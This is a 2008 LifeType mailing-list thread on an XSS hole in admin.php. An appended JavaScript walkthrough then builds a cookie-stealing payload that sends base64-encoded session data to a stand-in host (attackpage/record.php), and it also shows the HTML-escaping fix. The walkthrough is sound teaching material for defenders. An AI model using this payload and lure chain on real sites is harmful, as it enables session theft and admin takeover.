[pLog-svn] Lifetype 1.2.8 ...

Matt Wood matt at woodzy.com
Mon May 5 10:47:38 EDT 2008


Oh, and it's just as bad for single users and multiple... you're safe if you
NEVER have other tabs open and always sign out... but... that's not standard
behavior (at least for me)

On Mon, May 5, 2008 at 10:44 AM, Matt Wood <matt at woodzy.com> wrote:

> Here is a common exploitation scenario for you...
>
> An Attacker is targeting the lifetype.net site, he wants admin.
>
> He knows from emails and reading around that Oscar, Reto, Mark and Jon are
> likely to have admin on that page, so he makes a webpage on geocities or
> google or something.
>
> On this webpage he has javascript (or a meta refresh tag or an HTTP 302)
> that immediately redirects you to lifetype.net/admin.php with some
> javascript payload utilizing the XSS exploit.
>
> This javascript payload can utilize XSS to create an img tag, this img tag
> has a src of
> http://attackpage/record.php?data=admincredentials-base64ed (or something)
> as long as the data fits in the get parameters. You could also
> create a form and have no limit.
>
> Now all the attacker has to do is email each of you telling you that he
> has found a serious bug in lifetype, and he has screenshots on this page
> http://google/blah.(html|php|jpg) (depending on his level of control of
> the site). Maybe he even puts screen
> shots on there so it doesn't look too scary... and uses an iframe to do the
> actual attack. You would never know unless you are monitoring all your
> traffic through a proxy.
>
> XSS is ALWAYS serious.
>
>
> On Mon, May 5, 2008 at 1:00 AM, Mark Wu <markplace at gmail.com> wrote:
>
> > >       Can you post an example?  I am still not getting how
> > > the server-side is involved. I understand that if I put
> > > javascript on the admin's site, the javascript would have
> > > access to stuff, but the browser is supposed to block
> > > javascript from grabbing stuff from one site and posting it
> > > to another, right?  So, somehow he grabs stuff via
> > > javascript, posts it to admin.php which then posts stuff to
> > > another site?
> >
> > I have no idea either. Reto, if you can provide an example here, that will
> > be very helpful.
> >
> > >       Sure, that's fine, but as far as I can tell, all inputs
> > > would be susceptible to the same problem, so fixing one
> > > variable isn't really a fix.
> >
> > Not "all" inputs, just those inputs where we use the string validator and
> > which are not filtered by htmlfilter (strip tags) or are displayed without
> > escaping HTML special characters ...
> >
> > I think quite few ..
> >
> > Mark
> >
> > _______________________________________________
> > pLog-svn mailing list
> > pLog-svn at devel.lifetype.net
> > http://limedaley.com/mailman/listinfo/plog-svn
> >
>
>
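The chain Matt describes (a lure page redirects the logged-in admin to admin.php with a script payload in a vulnerable parameter; the injected script drops an img whose src carries the base64-encoded session credentials to the attacker's record.php; the browser's same-origin policy does not block an outbound image fetch, only reading the response) as an added JavaScript example, not code from this thread or from LifeType. The parameter name `filter`, the attacker host and the cookie value are assumptions; the thread does not name the actual vulnerable variable. The second half shows the fix Mark points at: escaping HTML special characters at output rather than trusting the string validator.

```javascript
// Added example (not LifeType code): the XSS -> credential exfiltration chain
// from the thread, and the output-escaping fix. Runs under Node.js.

const ATTACKER = 'http://attackpage/record.php';      // assumed attacker collector
const TARGET   = 'http://lifetype.net/admin.php';     // target named in the thread
const PARAM    = 'filter';                            // hypothetical vulnerable parameter

// What the injected script does inside the victim's admin session: encode the
// credentials and put them in an <img src>. An image request is a plain
// cross-site GET, so the same-origin policy does not stop it leaving.
function buildExfilUrl(credentials) {
  const data = Buffer.from(credentials, 'utf8').toString('base64');
  return `${ATTACKER}?data=${encodeURIComponent(data)}`;
}

// The payload placed in the vulnerable parameter. In a real browser
// document.cookie would hold the PHP session id; here it is just text.
const PAYLOAD =
  `<script>new Image().src='${ATTACKER}?data='+btoa(document.cookie)</script>`;

// The link the lure page redirects to (meta refresh, 302, or location.href).
function buildLureUrl() {
  return `${TARGET}?${PARAM}=${encodeURIComponent(PAYLOAD)}`;
}

// Vulnerable rendering: a "string validator" accepted the value and it is
// echoed straight into the admin page.
function renderVulnerable(params) {
  return `<h1>Admin</h1><p>Filter: ${params[PARAM]}</p>`;
}

// Hardened rendering: escape the five HTML special characters at output time.
function escapeHtml(s) {
  return String(s)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#039;');
}

function renderHardened(params) {
  return `<h1>Admin</h1><p>Filter: ${escapeHtml(params[PARAM])}</p>`;
}

// Crude check: did a live <script> tag survive into the rendered HTML?
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

// What the attacker reads back out of record.php's request log.
function decodeExfil(url) {
  const data = new URL(url).searchParams.get('data');
  return Buffer.from(data, 'base64').toString('utf8');
}

// Walk through the chain with a constructed session cookie.
const COOKIE = 'PHPSESSID=constructed-session-id';   // constructed sample, not real
console.log('lure link      :', buildLureUrl());
console.log('vulnerable html:', renderVulnerable({ [PARAM]: PAYLOAD }));
console.log('exfil request  :', buildExfilUrl(COOKIE));
console.log('attacker sees  :', decodeExfil(buildExfilUrl(COOKIE)));
console.log('hardened html  :', renderHardened({ [PARAM]: PAYLOAD }));
```

The point of the two render functions is the one Mark makes: whether a value passed a string validator on input is irrelevant once it is written into HTML unescaped, so the fix belongs at the output side for every echoed field, not in one variable's validator.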

